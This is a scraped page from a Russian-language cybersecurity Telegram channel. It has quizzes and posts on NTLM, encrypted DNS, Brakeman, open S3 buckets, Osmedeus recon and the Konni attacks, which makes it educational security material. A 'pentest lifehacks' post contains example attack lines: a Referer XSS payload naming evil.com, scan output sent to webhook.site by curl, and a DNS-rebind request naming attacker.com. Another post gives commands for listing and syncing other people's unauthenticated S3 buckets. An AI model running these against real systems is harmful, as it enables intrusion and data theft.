ZeroDay | Кибербезопасность – Telegram
ZeroDay | Кибербезопасность
43.1K subscribers
630 photos
7 videos
8 files
825 links
Ваш учебник по кибербезопасности

Реклама - @bashmak_media

https://telega.in/c/cybersec_academy

РКН: https://vk.cc/cHYqeq
Download Telegram
Что является основным риском при использовании протокола NTLM в современных доменах Windows?
Anonymous Quiz
19%
Отсутствие поддержки Kerberos
68%
Возможность атак Pass-the-Hash
4%
Сложность настройки
10%
Высокая нагрузка на сеть
7👎1🔥1
This media is not supported in your browser
VIEW IN TELEGRAM
👋 Приветствую в мире цифровой безопасности! Сегодня расскажу о новой фиче российской нейронки.

Теперь с нейросетью можно говорить, как с живым человеком — задавать вопросы, перебивать в процессе и получать транскрипцию разговора. Функция уже работает в вэбе и на Android в бета-версии.

Мы проверили, как ИИ справляется с реальными вопросами. На запрос «Какие профессии будут востребованы в ближайшие 5–10 лет?» ГигаЧат ответил: «Самые перспективные направления — экология и устойчивое развитие, биотехнологии и здравоохранение, а также сервисы, связанные с комфортом жизни».

Общение получается очень естественным — можно уточнять детали, спорить и развивать тему, как в разговоре с экспертом.
Теперь ГигаЧат не просто отвечает на запросы, а помогает осмысленно смотреть в будущее профессий.

ZeroDay | #ИИ
Please open Telegram to view this post
VIEW IN TELEGRAM
💩1942🔥2🤔1
Какая техника позволяет злоумышленнику получить хэш пароля из памяти процесса LSASS в Windows?
Anonymous Quiz
28%
DLL Injection
38%
Mimikatz
20%
Token Impersonation
14%
Man-in-the-Middle
😭27👍7🤯5👎1
Жизнь как коробка с печеньками: что скрывают cookie-баннеры

Каждый день вы кликаете «Принять всё» - но что на самом деле принимаете? Cookie-баннеры давно превратились из заботы о приватности в инструмент манипуляции: UX-дизайн, закон и аналитика переплелись в одной кнопке.

В статье расскажут, как появились cookie, зачем их заставили сопровождать баннером, почему от этого страдает статистика и что скрывается за “необходимыми” файлами. Плюс, как сайты отслеживают вас даже без cookies.

ZeroDay | #Статья
Please open Telegram to view this post
VIEW IN TELEGRAM
7👍4🤔3🔥1
Защита приватности: Encrypted DNS

👋 Приветствую в мире цифровой безопасности!

Сегодня расскажу, как конкретно зашифрованный DNS защищает нашу приватность и в целом делает интернет безопаснее.

Когда вы вводите адрес сайта, ваше устройство ищет его IP через DNS - это как справочник адресов. Без него пришлось бы запоминать длинные числа вроде 192.0.2.1 для каждого ресурса. DNS работает миллионы раз в день, соединяя вас с сайтами, приложениями и сервисами.

Открытый DNS - «письмо без конверта»: Традиционный DNS отправляет запросы в открытом виде. Провайдер видит, какие сайты вы посещаете, хакеры могут перехватывать и подменять ответы, а государство или цензоры — блокировать ресурсы.

Зашифрованный DNS - буквально«конверт с секретом»: Здесь ваши запросы шифруются протоколами DoH, DoT, DNSCrypt или DoQ. Только ваш компьютер и сервер видят, куда вы заходите. Любые попытки подмены или перехвата данных становятся практически невозможными.

Протоколы шифрования:

➡️DoH (DNS over HTTPS) - маскирует DNS-запросы среди обычного трафика.
➡️DoT (DNS over TLS) - защищает канал, предотвращает подмену.
➡️DNSCrypt - шифрует и подписывает запросы.
➡️DoQ (DNS over QUIC) - быстрый и стабильный вариант для сложных сетей.

Популярные провайдеры: NextDNS, AdGuard DNS, Cloudflare 1.1.1.1 дают возможность легко включить зашифрованный DNS на всех устройствах.

ZeroDay | #DNS
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥138👍6🤔1
Brakeman: статический сканер для Rails

👋 Приветствую в мире цифровой безопасности!

Поговорим о еще одном инструменте безопасности.

Brakeman - статический сканер уязвимостей для Ruby on Rails. Находит SQL‑инъекции, XSS, unsafe mass assignment, command injection и прочие привычные неприятности 😬Приложение запускать не нужно. Brakeman читает исходники и выдаёт готовые артефакты для ревью и CI.

Brakeman парсит Rails‑код, сопоставляет потоки данных и сигнатуры уязвимостей и генерирует понятные отчёты. Самое то для локального скана, nightly‑job или как обязательная проверка в pre‑merge pipeline.

И кстати работает с Rails от 2.3 до 8.x и легко встраивается в CI/CD, один запуск в pipeline и ты видишь все горящие проблемы ещё до мержа. HTML‑отчёт для дев‑ревью, JSON - для автоматизации и триажа.

Ловите самые нужные команды:

# Установка через gem
gem install brakeman

# Быстрый запуск в корне Rails
brakeman

# Скан через Docker (цветной вывод)
docker run -v "$(pwd)":/code presidentbeef/brakeman --color

# HTML-отчёт
brakeman -o brakeman_results.html

# Только высокоуровневые (High) предупреждения
brakeman -w3

# Создать/редактировать список игнорируемых предупреждений
brakeman -I


ZeroDay | #Инструмент
Please open Telegram to view this post
VIEW IN TELEGRAM
👍82
Как быстро найти открытые S3‑бакеты

👋 Приветствую в мире цифровой безопасности!

Сегодня поговорим, как быстро найти открытые Amazon S3-бакеты и проверить их внутрянку.

Открытые S3-бакеты - это частая проблема в облачных средах: иногда компании или команды случайно делают их публичными, и конфиденциальные данные становятся доступными вообще любому.

Скан по URL и поддоменам: юзаем awscli или s3cmd, чтобы понять, доступен ли бакет без авторизации. Shadow-бакеты часто лежат на случайных поддоменах.

aws s3 ls s3://example-bucket --no-sign-request
s3cmd ls s3://example-bucket


Проверяем на публичный доступ: Смотрим, кто может читать файлы. Иногда бакет открыт полностью, а иногда только для конкретных IP.

aws s3api get-bucket-acl --bucket example-bucket
aws s3api get-bucket-policy --bucket example-bucket


Скачивание или выборочная проверка: Если бакет публичный, можно безопасно глянуть содержимое или скачать отдельные файлы для анализа.

aws s3 cp s3://example-bucket/test.txt ./ --no-sign-request
aws s3 sync s3://example-bucket ./local-folder --no-sign-request


ZeroDay | #безопасность
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6
Pentest, Red Team и Bug Bounty: в чем разница?

👋 Приветствую в мире цифровой безопасности!

Вспомним, чем отличаются эти три формата тестирования.

Pentest - это такой контролируемый взлом. Команда проверяет конкретные системы по заранее согласованному плану: ищет уязвимости, доказывает возможность их эксплуатации и даёт отчёт. Нужно для оценки уровня защиты и соблюдения комплаенса.

Red Team - симуляция реального нападения. Тут уже цель не просто найти дыру, а проверить, как компания обнаружит и отреагирует на атаку. Используются социальная инженерия, фишинг, обход SOC. Можно сказать, что здесь уже все реалистичнее, только без ущерба, ясное дело.

Bug Bounty - прямо открытая охота. Компания публикует правила, и исследователи со всего мира ищут уязвимости за вознаграждение. Чем шире охват - тем больше и шанс найти то, что не заметили даже опытные тестеры.

ZeroDay | #безопасность
Please open Telegram to view this post
VIEW IN TELEGRAM
13👍4
Когда прячешь
логин и пароль от админки прямо в комментах HTML-кода…

ZeroDay | #мем
😁5110💋4👍1
А кто у вас отвечает за kube-api? Безопасность Kubernetes при помощи CIS Benchmark

Каждый кластер Kubernetes - буквально живой организм: он управляет сервисами, хранит состояние и следит за апками. Но один неверный флаг в kube-apiserver или слабые права на etcd могут превратить его в дыру для данных и процессов.

В статье разобрали, как CIS Benchmark помогает закрыть очевидные уязвимости, какие настройки мастера и etcd стоит мониторить, и на что обратить внимание, чтобы кластер работал на 💯

ZeroDay | #Статья
Please open Telegram to view this post
VIEW IN TELEGRAM
10👍1💩1
Osmedeus: автоматизируем рекон

👋 Приветствую в мире цифровой безопасности!

Поговорим о еще одном инструменте безопасности.

Osmedeus - workflow‑движок для рекона: собирает подписи, пробегает словари, складывает результаты и масштабируется на аж сотню целей. Идея простая - не выполнять по 100 скриптов вручную.

Супер легко кастомить и масштабировать: свои воркфлоу, свои wordlists, режимы «gentle/aggressive», бэкапы воркспейсов и cron‑запуски.

Для начала установим:

# автоматическая install-скрипт
bash <(curl -fsSL https://raw.githubusercontent.com/osmedeus/osmedeus-base/master/install.sh)

# или сборка из исходников (Go >=1.17)
go install -v github.com/j3ssie/osmedeus@latest


Простой скан (general flow)

osmedeus scan -t sample.com


Исключить модули (например, скриншоты и spider)

osmedeus scan -t sample.com -x screenshot -x spider


Запуск конкретного модуля (content discovery из файла с URL)

osmedeus scan -m content-discovery -t http-file.txt


Настройка скорости, потоков и чанков

osmedeus scan --tactic gently -t sample.com
osmedeus scan --threads-hold=15 -f cidr -t 1.2.3.4/24
osmedeus scan --chunk --chunk-parts 20 -f cidr -t list-of-100-cidr.txt


ZeroDay | #Инструмент
Please open Telegram to view this post
VIEW IN TELEGRAM
👍93👏3
Корейские хакеры удаленно стирали данные с помощью Google Find Hub

👋 Приветствую в мире цифровой безопасности!

Расскажу, как северокорейская группа Konni использовала обычные функции Google, чтобы красть данные и удалять их с устройств жертв.

Что это было: группа Konni (aka Earth Imp, Opal Sleet, Osmium, TA406, Vedalia) рассылала вредоносное ПО под видом приложений для снятия стресса. С помощью фишинговых писем и компрометации ПК они крали учётные данные Google жертв, а затем через Find Hub инициировали удалённую очистку устройств.

Как это было: заражённый ПК оставался под наблюдением более года. Группировка использовала Lilith RAT и EndRAT для шпионажа, управления системой и кражи данных из Google и Naver. Автоматизированные скрипты запускались каждую минуту, выполняя команды на заражённых машинах - от скачивания и загрузки файлов до удаления данных.

Последствия - печальны: люди потеряли личные данные без возможности восстановить их. Хакеры также чистили почту, удаляли уведомления Google и подчищали следы активности, чтобы скрыть свои действия.

Konni использовали Remcos RAT, Quasar RAT и RftRAT, а атаки были ориентированы на корейских пользователей. Google отметил, что уязвимостей в Android или Find Hub не было - атака требовала компрометации ПК и кражи учётных данных.

ZeroDay | #история
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥83👍3😱2
This media is not supported in your browser
VIEW IN TELEGRAM
3 лайфхака для пентестинга

👋 Приветствую в мире цифровой безопасности!

Расскажу о трех полезных фишках при пентесте.


XSS в заголовки через Referer + webhook-лог: проходит через CSP, фиксирует кражу куки/токена без JS.

GET /page HTTP/1.1
Host: target.example.com
Referer: https://evil.com/?xss=


Однострочный SMB-скан с enum4linux-ng + webhook-результат: Быстро собирает шары/юзеров, отправляет на webhook.

enum4linux-ng -A target.example.com | curl -s -X POST https://webhook.site/your-id --data-binary @-


➡️Защита: фильтровать Referer, отключить NTLM где не нужно, мониторить 445/tcp.

DNS-rebind через короткое TTL + webhook-ping: обходит локальные ограничения, подтверждает доступ к internal.

echo "127.0.0.1 target.internal" > /tmp/rebind
curl -s --resolve attacker.com:80:127.0.0.1 https://webhook.site/your-id -d "rebind_success=$(date)"


➡️Защищаемся так: DNS с анти-rebind, проверка Host заголовка, запрет external DNS в internal.

ZeroDay | #пентест
Please open Telegram to view this post
VIEW IN TELEGRAM
7👍2👏1
Двойное шифрование секретов: когда и зачем нужно?

👋 Приветствую в мире цифровой безопасности!

Сегодня расскажу, как повысить защиту секретов приложений и почему одного шифрования часто недостаточно.

Секреты - это пароли, токены и ключи. Если хранить их как попало, они легко «утекут». В приложениях всё сложнее: вы не знаете, кто может видеть память программы и могут ли данные перехватить. Идея по сути простая: минимально держать секрет в памяти - получил, использовал и удалил. Так снижается шанс утечки через дампы памяти, снапшоты ВМ или трейсы упавших приложений.

Проблема хранилищ секретов: Даже продвинутые СХС шифруют данные, но ключ для расшифровки хранится в памяти процесса. На «железе» это относительно безопасно, но в виртуализации можно незаметно сделать снапшот и получить доступ к секрету и ключу, а значит - расшифровать всё. А если ВМ много, то уследить сложно.

Двойное шифрование, в чем разница: дополнительный слой шифрования. Например, в HashiCorp Vault или Deckhouse Stronghold EE:

➡️Данные шифруются AES в Storage.
➡️Ключ key для расшифровки хранится в памяти процесса.
➡️Снэпшот ВМ → секрет + ключ → всё расшифровано.

С HSM (seal wrap) ситуация уже меняется:
Данные шифруются ещё одним ключом, который нельзя извлечь.
Даже если key утёк, данные в безопасности.
Cache можно отключить, чтобы минимизировать риск через снапшоты.

Когда HSM нет: Используем транзитное шифрование: ключ хранится на другой ВМ или в другом дата-центре. Чтобы расшифровать данные, хакеру нужен синхронный снапшот двух ВМ, что почти невозможно.

Делаем вторую часть?

ZeroDay | #шифрование
Please open Telegram to view this post
VIEW IN TELEGRAM
👍242🤔21
Какой признак часто указывает на эксплуатацию blind SQL injection, несмотря на отсутствие ошибок и вывода?
Anonymous Quiz
18%
Увеличенное количество UDP-пакетов
57%
Повышение латентности ответа при использовании time‑based payload’ов (SLEEP(5))
17%
Рост CPU на базе данных
8%
Обрыв HTTPS‑сессий
😭10👍2🔥1
Как устроена цензура изнутри: взгляд на китайский фаервол TSG-X

Подробно разобрали 500 Гб утечек с оборудования провайдеров Китая, чтобы показать, как страна контролирует интернет. VPN, Tor, необычные потоки данных - всё проходит через «чёрную коробку» TSG-X, которая фильтрует, блокирует и помечает трафик, часто без прямого понимания, что именно блокируется.

В статье рассматривают цепочки правил, принципов DPI и управления обновлениями, а также того, как система умеет выявлять новые сервисы и потенциально ограничивать доступ пользователей, ещё до того, как они что-то сделают.

ZeroDay | #Статья
Please open Telegram to view this post
VIEW IN TELEGRAM
5👍2
📝 Сканеры уязвимостей по CVE

ZeroDay | #CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
👍204👾3❤‍🔥1🔥1